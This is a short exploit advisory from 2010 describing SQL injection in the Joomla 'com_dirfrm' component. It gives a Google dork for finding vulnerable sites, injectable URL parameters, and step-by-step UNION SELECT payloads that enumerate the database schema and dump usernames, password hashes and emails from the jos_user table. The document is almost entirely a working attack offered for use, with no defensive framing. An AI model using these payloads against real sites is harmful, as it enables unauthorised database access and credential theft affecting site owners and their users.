# Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability
# Date : 18 - 8 - 2010
# Author : Hieuneo (Vietnam)
# Version : All Versions
# Tested on : Win 7 Home
 
###############################################
Dork google: inurl:"com_dirfrm"
###############################################
Exploit:
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL
Injection]&id=8&Itemid=32
or
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL
Injection]&Itemid=32
###############################################
[SQL Injection]:
-> Step1:
- order by n--- False
- order by n+1-- True
 
-> Step2:null  Union select 1,2,3,4,...,n+1--
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32
 
-> Step3: replace display number on website
version(), user(), database
#if version SQL >=5 : try exploit with table system:
___table_name from information_scheama.tables where table_schema=database()--
___column_name form information_schema.columns where table_name=Char(name table)
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name
 
-> Step 4: collecting information
 
null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--
 
Done!
#############Hieuneo@VBF################
--
Hieuneo